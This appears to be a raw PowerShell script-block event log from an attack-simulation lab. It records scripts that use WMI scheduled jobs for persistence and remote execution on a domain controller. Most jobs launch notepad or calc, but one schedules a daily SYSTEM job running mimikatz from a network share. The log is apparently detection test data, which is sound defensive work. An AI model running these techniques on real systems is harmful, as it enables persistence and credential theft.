4104152150x0764404Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11$newTask = ([wmiclass]"\\$computerName\root\cimv2:Win32_ScheduledJob").CreateInstance() $newTask.Command = "notepad.exe" $newTask.StartTime = [Management.ManagementDateTimeConverter]::ToDmtfDateTime((Get-Date).AddMinutes(1)) $newTask.Put() # Get the list of scheduled tasks using WMI $scheduledTasks = Get-WmiObject -Class Win32_ScheduledJob -Namespace "root\CIMV2" # Select a random task to modify $randomTask = Get-Random -InputObject $scheduledTasks # Set the path to Notepad.exe $notepadPath = "C:\Windows\System32\notepad.exe" # Generate a random time to run the task $randomTime = Get-Date -Hour (Get-Random -Minimum 0 -Maximum 23) -Minute (Get-Random -Minimum 0 -Maximum 59) # Modify the selected task to run Notepad.exe at the random time if ($randomTask -ne $null) { $randomTask.Command = "$notepadPath" $randomTask.StartTime = $randomTime $randomTask.Put() } else { Write-Host "No tasks found to modify." } aa0922db-be31-42a5-9299-22845027e9bf 4104152150x0764375Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11# Get the list of scheduled tasks using WMI $scheduledTasks = Get-WmiObject -Class Win32_ScheduledJob -Namespace "root\CIMV2" # Select a random task to modify $randomTask = Get-Random -InputObject $scheduledTasks # Set the path to Notepad.exe $notepadPath = "C:\Windows\System32\notepad.exe" # Generate a random time to run the task $randomTime = Get-Date -Hour (Get-Random -Minimum 0 -Maximum 23) -Minute (Get-Random -Minimum 0 -Maximum 59) # Modify the selected task to run Notepad.exe at the random time if ($randomTask -ne $null -and $randomTask.Command -ne $null -and $randomTask.StartTime -ne $null) { $randomTask.Command = "$notepadPath" $randomTask.StartTime = $randomTime $randomTask.Put() } else { Write-Host "No valid tasks found to modify." } e6169232-4ffc-4318-aed4-0c6e1d6d8654 4104152150x0764318Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11$newTask = ([wmiclass]"\\$computerName\root\cimv2:Win32_ScheduledJob").CreateInstance() $newTask.Command = "notepad.exe" $newTask.StartTime = [Management.ManagementDateTimeConverter]::ToDmtfDateTime((Get-Date).AddMinutes(1)) $newTask.Put() # Get the list of scheduled tasks using WMI $scheduledTasks = Get-WmiObject -Class Win32_ScheduledJob -Namespace "root\CIMV2" # Select a random task to modify $randomTask = Get-Random -InputObject $scheduledTasks # Set the path to Notepad.exe $notepadPath = "C:\Windows\System32\notepad.exe" # Generate a random time to run the task $randomTime = Get-Date -Hour (Get-Random -Minimum 0 -Maximum 23) -Minute (Get-Random -Minimum 0 -Maximum 59) # Modify the selected task to run Notepad.exe at the random time if ($randomTask -ne $null) { $randomTask.Command = "$notepadPath" $randomTask.StartTime = $randomTime $randomTask.Put() } else { Write-Host "No tasks found to modify." } c9cbf4ce-cd0b-4ced-998a-d5c2b76b55e4 4104152150x0764247Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11# Create a new scheduled task to run Notepad.exe $newTask = ([wmiclass]'\\.\root\cimv2:Win32_ScheduledJob').CreateInstance() $newTask.Command = "C:\Windows\System32\notepad.exe" $newTask.StartTime = [System.Management.ManagementDateTimeConverter]::ToDmtfDateTime((Get-Date).AddMinutes(1)) $newTask.Put() # Get the list of scheduled tasks using WMI $scheduledTasks = Get-WmiObject -Class Win32_ScheduledJob -Namespace "root\CIMV2" # Select the newly created task $randomTask = $scheduledTasks | Where-Object { $_.Command -eq "C:\Windows\System32\notepad.exe" } # Generate a random time to run the task $notepadPath = "C:\Windows\System32\notepad.exe" $randomTime = Get-Date -Hour (Get-Random -Minimum 0 -Maximum 23) -Minute (Get-Random -Minimum 0 -Maximum 59) # Modify the selected task to run Notepad.exe at the random time $randomTask.Command = "$notepadPath" $randomTask.StartTime = $randomTime $randomTask.Put() 709e0eb4-e81d-4442-b210-d2cfa68afbd9 4104152150x0764221Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Get-WmiObject -Class Win32_ScheduledJob -Namespace "root\CIMV2"2420f210-cda8-4ac2-939d-53fe2605d75d 4104152150x0764150Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11# Get the list of scheduled tasks using WMI $scheduledTasks = Get-WmiObject -Class Win32_ScheduledJob -Namespace "root\CIMV2" # Select a random task to modify $randomTask = Get-Random -InputObject $scheduledTasks # Set the path to Notepad.exe $notepadPath = "C:\Windows\System32\notepad.exe" # Generate a random time to run the task $randomTime = Get-Date -Hour (Get-Random -Minimum 0 -Maximum 23) -Minute (Get-Random -Minimum 0 -Maximum 59) # Modify the selected task to run Notepad.exe at the random time $randomTask.Command = "$notepadPath" $randomTask.StartTime = $randomTime $randomTask.Put() ec468edb-6c83-436c-811d-b533c193c0c4 4104152150x0763986Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Get-WmiObject -Class Win32_ScheduledJob -ComputerName "mswin-dc01.attackrange.local" -Credential "attackrange.local\administrator" -Impersonation 3 -Authentication 6 -EnableAllPrivileges | ForEach-Object { $_.Create("Notepad.exe", "********130000.000000-420", $null, 1, $null, $null) }9c991ba5-7012-48c8-911b-628941286752 4104152150x0763625Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Get-WmiObject -Class Win32_ScheduledJob -ComputerName "mswin-dc01.attackrange.local" -Credential "attackrange.local\administrator" -Impersonation 3 -Authentication 6 -EnableAllPrivileges | ForEach-Object { $_.Create("Notepad.exe", "********130000.000000-420", $null, 1, $null, $null) }d84f01e0-ee62-4e4f-99a4-8be4d0b4a466 4104152150x0763599Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11([wmiclass]'Win32_ScheduledJob').Create("Notepad.exe", "********130000.000000-420", $null, 1, $null, $null) 7f3f6b93-cfde-428a-865d-7a04f671fff1 4104152150x0763569Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11([wmiclass]'Win32_ScheduledJob').Create("Notepad.exe", "********130000.000000-420", $false, 0, $null, $null, "NotepadJob") 4914f930-aede-425e-be0c-c5df01bd7320 4104152150x0763543Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11([wmiclass]'Win32_ScheduledJob').Create("Notepad.exe", "********130000.000000-420", $false, 0, $null, $null, "NotepadJob") 3ea19a68-5b3b-42a2-818a-1b09e45eb0e3 4104152150x0763518Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11([wmiclass]'Win32_ScheduledJob').Create("Notepad.exe", "********130000.000000-420", $false, 0, $null, $null, "NotepadJob") a8d8d5db-4297-457e-804a-488dfe2eb649 4104152150x0763437Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11$computerName = "mswin-dc01.attackrange.local" $taskName = "MyTask" $executablePath = "C:\Windows\System32\calc.exe" # Generate a unique job ID $jobId = (Get-Random -Minimum 1000 -Maximum 9999) # Connect to the remote endpoint using WMI $wmi = Get-WmiObject -Class Win32_ScheduledJob -ComputerName $computerName # Create the scheduled job $job = $wmi.CreateInstance() $job.JobId = $jobId $job.Command = $executablePath $job.StartDay = 0 $job.StartHour = 0 $job.StartMinute = 0 $job.Name = $taskName # Save the scheduled job $job.Put() d212c650-22c1-4b0a-9c32-413e1fc11297 4104152150x0763369Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11$computerName = "mswin-dc01.attackrange.local" $taskName = "MyAtomicTask" $executablePath = "C:\Windows\System32\calc.exe" $startTime = [Management.ManagementDateTimeConverter]::ToDmtfDateTime((Get-Date).AddMinutes(1)) $remoteComputer = "\\$computerName" $job = ([WMIClass]"$remoteComputer\root\cimv2:Win32_ScheduledJob").CreateInstance() $job.JobId = "ScheduledTask" $job.Command = "$executablePath" $job.StartTime = $startTime $job.RunRepeatedly = $false $job.Interactive = $true $job.RunOnlyIfLoggedOn = $false $job.Put() 9f02a7b9-d6d1-4f16-af19-7812a5e29c49 4104132150x0763173Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11# Remote computer name or IP address $remote_computer = 'mswin-dc01.attackrange.local' # Scheduled task settings $task_name = 'MyAtomicWMITask' $task_command = 'powershell.exe -File "\\10.0.1.17\c$\temp\mimikatz.exe"' $trigger_frequency = 'DAILY' $trigger_time = '10:00:00 PM' # Connect to remote computer using WMI $wmi = Get-WmiObject -Class Win32_ScheduledJob -Namespace "root\CIMV2" -ComputerName $remote_computer # Set up scheduled task properties $job = $wmi.CreateInstance() $job.JobId = $null $job.Command = $task_command $job.Owner = "NT AUTHORITY\SYSTEM" $job.Priority = 3 $job.StartTime = (Get-Date $trigger_time).ToUniversalTime() $job.Interval = 86400 # Number of seconds in a day $job.DayOfMonth = 0 $job.DaysOfWeek = 62 # Daily task $job.RunRepetitions = 0 $job.UntilTime = 0 # Submit scheduled task to remote computer $job.Put() # Schedule task using WMI $result = Invoke-WmiMethod -Class Win32_ScheduledJob -Name Create -ArgumentList $task_command, $trigger_frequency, $false, $null, $null, $true, 0, $trigger_time, $null, $null, $null -ComputerName $remote_computer cb88e3e6-f36d-406e-993d-884e362e84da